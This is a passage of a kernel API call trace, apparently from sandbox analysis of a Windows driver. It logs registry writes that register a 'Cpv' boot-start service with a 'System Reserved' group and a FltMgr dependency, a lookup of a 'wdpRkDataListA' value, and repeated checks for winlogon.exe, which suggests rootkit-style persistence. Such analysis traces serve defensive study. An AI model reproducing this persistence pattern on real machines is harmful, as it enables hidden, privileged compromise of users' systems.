| ZwClose | Handle_unk = 0xffffffff80000fbc, ret_val_out = 0x0 | ||||
| ObfDereferenceObject | Object_ptr = 0xffffe0003b478230, ret_val_ptr_out = 0x0 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffc000b90decd0, Tag = 0x0 | ||||
| RtlInitUnicodeString | SourceString = \??\C:\Windows\System32\drivers\Cpv.sys, DestinationString_out = \??\C:\Windows\System32\drivers\Cpv.sys | ||||
| RtlInitUnicodeString | SourceString = \Registry\Machine\SYSTEM\ControlSet001\Services\Cpv, DestinationString_out = \Registry\Machine\SYSTEM\ControlSet001\Services\Cpv | ||||
| ZwOpenKey | DesiredAccess_unk = 0x10000000, ObjectAttributes_ptr = 0xffffd00033d28c40, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \Registry\Machine\SYSTEM\ControlSet001\Services\Cpv, ObjectAttributes_deref_Attributes = 0x40, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, KeyHandle_ptr_out = 0xffffd00033d28fa0, KeyHandle_out = 0x0, ret_val_out = 0xc0000034 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| RtlInitUnicodeString | SourceString = \??\C:\Windows\System32\drivers\Cpv.sys, DestinationString_out = \??\C:\Windows\System32\drivers\Cpv.sys | ||||
| ZwCreateFile | DesiredAccess_unk = 0x100001, ObjectAttributes_ptr = 0xffffd00033d28780, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \??\C:\Windows\System32\drivers\Cpv.sys, ObjectAttributes_deref_Attributes = 0x40, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, AllocationSize_ptr = 0x0, FileAttributes = 0x80, ShareAccess = 0x3, CreateDisposition = 0x1, CreateOptions = 0x40, EaBuffer_ptr = 0x0, EaLength = 0x0, FileHandle_ptr_out = 0xffffd00033d28be0, FileHandle_out = 0x0, IoStatusBlock_unk_out = 0xffffd00033d287b0, ret_val_out = 0xc0000034 | ||||
| RtlInitUnicodeString | SourceString = DependOnService, DestinationString_out = DependOnService | ||||
| ZwCreateKey | DesiredAccess_unk = 0xf003f, ObjectAttributes_ptr = 0xffffd00033d28c40, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \Registry\Machine\SYSTEM\ControlSet001\Services\Cpv, ObjectAttributes_deref_Attributes = 0x40, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, TitleIndex = 0x0, Class_ptr = 0x0, CreateOptions = 0x0, KeyHandle_ptr_out = 0xffffd00033d28fb8, KeyHandle_out = 0xffffffff80000aa0, Disposition_ptr_out = 0xffffd00033d28fa8, Disposition_out = 0x1, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwSetValueKey | KeyHandle_unk = 0xffffffff80000aa0, ValueName = DependOnService, TitleIndex = 0x0, Type = 0x1, Data = FltMgr, DataSize = 0xe, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9d01060, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9d01060, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d28758, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9d01060, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9d01060, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d28438, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x78, ret_val_ptr_out = 0xffffe0003a763520 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9d01060, Length = 0x78, ObjectNameInfo_unk_out = 0xffffe0003a763520, ReturnLength_ptr_out = 0xffffd00033d28438, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Cpv, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Cpv | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763520, Tag = 0x0 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x20, ret_val_ptr_out = 0xffffe0003c634190 | ||||
| _wcsicmp | _String1 = DependOnService, _String2 = ImagePath, ret_val_out = -5 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634190, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwFlushKey | KeyHandle_unk = 0xffffffff80000aa0, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwClose | Handle_unk = 0xffffffff80000aa0, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| RtlInitUnicodeString | SourceString = ImagePath, DestinationString_out = ImagePath | ||||
| ZwCreateKey | DesiredAccess_unk = 0xf003f, ObjectAttributes_ptr = 0xffffd00033d28c40, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \Registry\Machine\SYSTEM\ControlSet001\Services\Cpv, ObjectAttributes_deref_Attributes = 0x40, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, TitleIndex = 0x0, Class_ptr = 0x0, CreateOptions = 0x0, KeyHandle_ptr_out = 0xffffd00033d28fb8, KeyHandle_out = 0xffffffff80000aa0, Disposition_ptr_out = 0xffffd00033d28fa8, Disposition_out = 0x2, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwSetValueKey | KeyHandle_unk = 0xffffffff80000aa0, ValueName = ImagePath, TitleIndex = 0x0, Type = 0x2, Data = \SystemRoot\System32\drivers\Cpv.sys, DataSize = 0x4a, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9d01060, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9d01060, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d28758, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9d01060, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9d01060, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d28438, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x78, ret_val_ptr_out = 0xffffe0003a763520 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9d01060, Length = 0x78, ObjectNameInfo_unk_out = 0xffffe0003a763520, ReturnLength_ptr_out = 0xffffd00033d28438, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Cpv, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Cpv | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763520, Tag = 0x0 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x14, ret_val_ptr_out = 0xffffe0003c634190 | ||||
| _wcsicmp | _String1 = ImagePath, _String2 = ImagePath, ret_val_out = 0 | ||||
| ZwOpenKey | DesiredAccess_unk = 0xf003f, ObjectAttributes_ptr = 0xffffd00033d284a8, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Cpv, ObjectAttributes_deref_Attributes = 0x40, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, KeyHandle_ptr_out = 0xffffd00033d284a0, KeyHandle_out = 0xffffffff80001098, ret_val_out = 0x0 | ||||
| RtlInitUnicodeString | SourceString = wdpRkDataListA, DestinationString_out = wdpRkDataListA | ||||
| ZwQueryValueKey | KeyHandle_unk = 0xffffffff80001098, ValueName = wdpRkDataListA, KeyValueInformationClass_unk = 0x2, Length = 0x0, KeyValueInformation_ptr_out = 0x0, ResultLength_ptr_out = 0xffffd00033d28758, ret_val_out = 0xc0000034 | ||||
| ZwClose | Handle_unk = 0xffffffff80001098, ret_val_out = 0x0 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634190, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwFlushKey | KeyHandle_unk = 0xffffffff80000aa0, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwClose | Handle_unk = 0xffffffff80000aa0, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| RtlInitUnicodeString | SourceString = Group, DestinationString_out = Group | ||||
| ZwCreateKey | DesiredAccess_unk = 0xf003f, ObjectAttributes_ptr = 0xffffd00033d28c40, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \Registry\Machine\SYSTEM\ControlSet001\Services\Cpv, ObjectAttributes_deref_Attributes = 0x40, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, TitleIndex = 0x0, Class_ptr = 0x0, CreateOptions = 0x0, KeyHandle_ptr_out = 0xffffd00033d28fb8, KeyHandle_out = 0xffffffff80000aa0, Disposition_ptr_out = 0xffffd00033d28fa8, Disposition_out = 0x2, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwSetValueKey | KeyHandle_unk = 0xffffffff80000aa0, ValueName = Group, TitleIndex = 0x0, Type = 0x2, Data = System Reserved, DataSize = 0x20, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9d01060, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9d01060, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d28758, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9d01060, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9d01060, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d28438, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x78, ret_val_ptr_out = 0xffffe0003a763520 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9d01060, Length = 0x78, ObjectNameInfo_unk_out = 0xffffe0003a763520, ReturnLength_ptr_out = 0xffffd00033d28438, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Cpv, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Cpv | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763520, Tag = 0x0 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xc, ret_val_ptr_out = 0xffffe0003c634250 | ||||
| _wcsicmp | _String1 = Group, _String2 = ImagePath, ret_val_out = -2 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634250, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwFlushKey | KeyHandle_unk = 0xffffffff80000aa0, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwClose | Handle_unk = 0xffffffff80000aa0, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| RtlInitUnicodeString | SourceString = ErrorControl, DestinationString_out = ErrorControl | ||||
| ZwCreateKey | DesiredAccess_unk = 0xf003f, ObjectAttributes_ptr = 0xffffd00033d28c40, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \Registry\Machine\SYSTEM\ControlSet001\Services\Cpv, ObjectAttributes_deref_Attributes = 0x40, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, TitleIndex = 0x0, Class_ptr = 0x0, CreateOptions = 0x0, KeyHandle_ptr_out = 0xffffd00033d28fb8, KeyHandle_out = 0xffffffff80000aa0, Disposition_ptr_out = 0xffffd00033d28fa8, Disposition_out = 0x2, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwSetValueKey | KeyHandle_unk = 0xffffffff80000aa0, ValueName = ErrorControl, TitleIndex = 0x0, Type = 0x4, Data_ptr = 0xffffd00033d28d50, Data = 0x1, DataSize = 0x4, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9d01060, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9d01060, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d28758, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9d01060, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9d01060, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d28438, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x78, ret_val_ptr_out = 0xffffe0003a763520 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9d01060, Length = 0x78, ObjectNameInfo_unk_out = 0xffffe0003a763520, ReturnLength_ptr_out = 0xffffd00033d28438, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Cpv, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Cpv | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763520, Tag = 0x0 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x1a, ret_val_ptr_out = 0xffffe0003c634190 | ||||
| _wcsicmp | _String1 = ErrorControl, _String2 = ImagePath, ret_val_out = -4 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634190, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwFlushKey | KeyHandle_unk = 0xffffffff80000aa0, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwClose | Handle_unk = 0xffffffff80000aa0, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| RtlInitUnicodeString | SourceString = Start, DestinationString_out = Start | ||||
| ZwCreateKey | DesiredAccess_unk = 0xf003f, ObjectAttributes_ptr = 0xffffd00033d28c40, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \Registry\Machine\SYSTEM\ControlSet001\Services\Cpv, ObjectAttributes_deref_Attributes = 0x40, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, TitleIndex = 0x0, Class_ptr = 0x0, CreateOptions = 0x0, KeyHandle_ptr_out = 0xffffd00033d28fb8, KeyHandle_out = 0xffffffff80000aa0, Disposition_ptr_out = 0xffffd00033d28fa8, Disposition_out = 0x2, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwSetValueKey | KeyHandle_unk = 0xffffffff80000aa0, ValueName = Start, TitleIndex = 0x0, Type = 0x4, Data_ptr = 0xffffd00033d28d50, Data = 0x0, DataSize = 0x4, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9d01060, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9d01060, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d28758, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9d01060, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9d01060, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d28438, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x78, ret_val_ptr_out = 0xffffe0003a763520 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9d01060, Length = 0x78, ObjectNameInfo_unk_out = 0xffffe0003a763520, ReturnLength_ptr_out = 0xffffd00033d28438, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Cpv, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Cpv | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763520, Tag = 0x0 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xc, ret_val_ptr_out = 0xffffe0003c634250 | ||||
| _wcsicmp | _String1 = Start, _String2 = ImagePath, ret_val_out = 10 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634250, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwFlushKey | KeyHandle_unk = 0xffffffff80000aa0, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwClose | Handle_unk = 0xffffffff80000aa0, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| RtlInitUnicodeString | SourceString = Type, DestinationString_out = Type | ||||
| ZwCreateKey | DesiredAccess_unk = 0xf003f, ObjectAttributes_ptr = 0xffffd00033d28c40, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \Registry\Machine\SYSTEM\ControlSet001\Services\Cpv, ObjectAttributes_deref_Attributes = 0x40, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, TitleIndex = 0x0, Class_ptr = 0x0, CreateOptions = 0x0, KeyHandle_ptr_out = 0xffffd00033d28fb8, KeyHandle_out = 0xffffffff80000aa0, Disposition_ptr_out = 0xffffd00033d28fa8, Disposition_out = 0x2, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
